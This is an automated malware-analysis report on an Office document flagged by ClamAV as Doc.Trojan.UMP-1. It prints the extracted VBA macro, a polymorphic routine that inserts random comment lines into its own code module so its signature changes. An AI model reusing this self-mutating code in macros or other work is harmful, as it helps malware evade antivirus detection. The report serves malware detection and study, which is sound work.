MALICIOUS
Risk Score: 140
Malware Insights
MITRE ATT&CK: T1059.005 Visual Basic
The sample is identified as malicious by ClamAV with a critical heuristic firing. It contains VBA macros, as evidenced by the 'OLE_VBA_MACROS' heuristic and the 'macros.bas' script. The VBA script appears to be a polymorphic obfuscation routine, likely intended to hide or modify a malicious payload. The specific payload or its execution method is not directly discernible from the provided script, leading to a slightly reduced confidence in family attribution.
Heuristics (2)
- ClamAV: Doc.Trojan.UMP-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.UMP-1
- VBA macros detected (medium, OLE_VBA_MACROS): Document contains VBA macro code
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 747 bytes |

SHA-256: 389f769689ca647f6b5ba288463149c4d273d03595ca13e00e5ef4befaea3890

Detection
- ClamAV: Doc.Trojan.UMP-1
- Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script)
```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "UMP"
Sub UMP()
'-=[ULTRAS MACRO POLYMORHIC]=-
PoNu = Int(Rnd() * 33 + 1)
For Mutate = 1 To PoNu
PoRL = Application.VBE.ActiveVBProject.VBComponents("UMP").CodeModule.CountOfLines
PoLi = Int(Rnd() * PoRL + 1)
a = Rnd * 455: b = Rnd * 80: c = Rnd * 160: d = Rnd * 180: e = Rnd * 49
Application.VBE.ActiveVBProject.VBComponents("UMP").CodeModule.InsertLines PoLi, vbTab & "' " & a & vbTab & b & vbTab & c & vbTab & d & vbTab & e
Next Mutate
End Sub
```